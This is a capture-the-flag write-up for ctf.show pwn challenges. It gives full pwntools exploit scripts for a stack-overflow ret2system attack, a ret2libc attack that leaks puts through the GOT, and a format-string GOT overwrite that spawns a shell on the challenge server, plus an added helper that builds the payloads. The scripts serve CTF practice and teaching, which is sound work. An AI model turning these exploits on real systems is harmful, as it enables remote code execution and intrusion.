https://ctf.show/challenges
Pwn check-in
Pwn2
EXP
```python
from pwn import *

# sh = process("./stack")                 # local test
sh = remote("124.156.121.112", 28032)
elf = ELF("./stack")

system = elf.sym["system"]                # system() is linked into the binary itself
binsh = next(elf.search(b"/bin/sh"))      # and so is a "/bin/sh" string

payload = b"a" * 13                       # padding up to the saved return address
payload += p32(system)                    # return into system()
payload += p32(system)                    # fake return address for system()
payload += p32(binsh)                     # first argument: pointer to "/bin/sh"

sh.recvuntil(b"\n")
sh.sendline(payload)
sh.interactive()
```
Pwn3
- This time there is no system() and no "/bin/sh" in the binary. After thinking it over for a while I noticed the program imports puts(), so let's just take the libc route: leak the libc address of puts through the GOT, compute the libc base, and return into system("/bin/sh").
EXP
```python
from pwn import *

sh = remote('124.156.121.112', 28065)
elf = ELF("./stack1")
libc = ELF("./libc6-i386_2.27-3ubuntu1_amd64.so")   # the libc shipped with the challenge

puts_got_addr = elf.got['puts']
puts_plt_addr = elf.plt['puts']
main_addr = elf.sym['_start']          # return here after the leak to get a second overflow

# Stage 1: call puts(puts@got) to print the libc address of puts, then restart the program
payload = b"a" * 13
payload += p32(puts_plt_addr)
payload += p32(main_addr)              # return address for puts(): run the program again
payload += p32(puts_got_addr)          # argument: GOT entry holding puts's libc address

sh.recvuntil(b"!\n")
sh.sendline(payload)
sh.recvuntil(b"\n\n")
puts_addr = u32(sh.recv(4))
print(hex(puts_addr))

# Stage 2: derive the libc base, then system() and "/bin/sh" inside libc
libc_puts_addr = libc.sym['puts']
base_addr = puts_addr - libc_puts_addr
success("Base_Addr:0x%x", base_addr)
system_addr = base_addr + libc.sym['system']
binsh_addr = base_addr + next(libc.search(b'/bin/sh'))

max_payload = b"a" * 13
max_payload += p32(system_addr)
max_payload += p32(main_addr)          # fake return address for system()
max_payload += p32(binsh_addr)         # argument: pointer to "/bin/sh"

sleep(1)
sh.recvuntil(b"\n")
sleep(1)
sh.sendline(max_payload)
sh.interactive()
```
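The address arithmetic the exploit above depends on, as an added worked example that is not part of the original writeup: it unpacks the 4-byte leak, derives the libc base, refuses a base that is not page-aligned (the usual symptom of a wrong libc build or a misparsed leak), and lays out both stages in the 32-bit cdecl shape used above (function, fake return address, argument). The libc offsets, the leaked bytes and the binary's addresses are made-up placeholders for this example, not the real values of this challenge; only struct is used so it runs without pwntools.

```python
import struct

PAGE = 0x1000          # libc is mmapped at a page-aligned base address


def p32(x):
    """Pack a 32-bit little-endian value, like pwntools' p32."""
    return struct.pack("<I", x & 0xffffffff)


def u32(b):
    """Unpack the first 4 bytes little-endian, like pwntools' u32."""
    return struct.unpack("<I", b[:4])[0]


def libc_base(leaked_addr, sym_offset):
    """libc base = leaked runtime address - that symbol's offset inside libc.
    A base that is not page-aligned means the leak was parsed wrongly or the
    libc we take offsets from is not the one running remotely."""
    base = leaked_addr - sym_offset
    if base & (PAGE - 1):
        raise ValueError("libc base 0x%x is not page-aligned: wrong libc or bad leak" % base)
    return base


def leak_stage(pad, puts_plt, restart, puts_got):
    """Stage 1: return into puts@plt; puts 'returns' to `restart` (_start or main,
    so the overflow can be triggered again) and gets puts@got as its argument."""
    return b"a" * pad + p32(puts_plt) + p32(restart) + p32(puts_got)


def shell_stage(pad, system_addr, binsh_addr, fake_ret=0xdeadbeef):
    """Stage 2: return into system(), a fake return address, then the "/bin/sh" pointer."""
    return b"a" * pad + p32(system_addr) + p32(fake_ret) + p32(binsh_addr)


# Hypothetical values constructed for this example (not the real ones for this challenge).
PUTS_OFF, SYSTEM_OFF, BINSH_OFF = 0x67140, 0x3cd10, 0x17b8cf   # symbol offsets inside libc
LEAK_BYTES = b"\x40\xb1\xe2\xf7"                               # what sh.recv(4) returns
PAD = 13                                                       # bytes up to the saved EIP
PUTS_PLT, PUTS_GOT, START = 0x08048300, 0x0804a010, 0x08048340


def build_stages():
    """Run the whole computation; returns (libc base, stage-1 payload, stage-2 payload)."""
    base = libc_base(u32(LEAK_BYTES), PUTS_OFF)
    stage1 = leak_stage(PAD, PUTS_PLT, START, PUTS_GOT)
    stage2 = shell_stage(PAD, base + SYSTEM_OFF, base + BINSH_OFF, fake_ret=START)
    return base, stage1, stage2


if __name__ == "__main__":
    base, s1, s2 = build_stages()
    print("libc base: 0x%x" % base)
    print("stage 1:", s1)
    print("stage 2:", s2)
```

The alignment check is cheap insurance: a leak that is off by even one byte (for example because a preceding newline was swallowed into the 4 bytes read) or offsets from a libc of a different version produce a base that is not a multiple of 0x1000, and it is better to stop there than to send a stage 2 that crashes the remote process.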
Pwn4
Running checksec on the program: a 32-bit binary with every mitigation enabled except PIE. My brow furrowed; this did not look like it would be pleasant.
Loading it into IDA: printf is called on the user buffer directly, with no format string, so there is a format-string vulnerability. There is also a getshell function in the program whose only job is to hand back a shell. Phew.
From here it is straightforward, and there are two ways to go: either hijack EIP straight to that function, or tamper with printf.
Taking the second option: overwrite the GOT entry of printf with the address of system, so that when the program reaches its printf call it actually executes system. The program happens to do exactly two rounds of input and output: the first input is used to overwrite printf's GOT entry, and in the second we only need to send /bin/sh, so that when the program executes printf(&buf) it really runs system('/bin/sh'). A GOT overwrite like this needs the GOT to still be writable at runtime, which Full RELRO would prevent.
EXP
```python
from pwn import *

# sh = process("./ex2")                  # local test
sh = remote("124.156.121.112", 28050)
elf = ELF("./ex2")

printf = 0x0804A014                      # printf's GOT entry, as read from IDA (elf.got['printf'])
system = elf.sym['system']

# First input: format-string write of system's address over printf's GOT entry.
# 6 is the stack argument index at which our buffer starts.
payload = fmtstr_payload(6, {printf: system})
sh.recvuntil(b"Hacker!\n")
sh.sendline(payload)
sleep(2)

# Second input: printf(&buf) is now system(buf), so buf is just "/bin/sh"
sh.recvuntil(b"\n")
sh.sendline(b"/bin/sh\x00")
sh.interactive()
```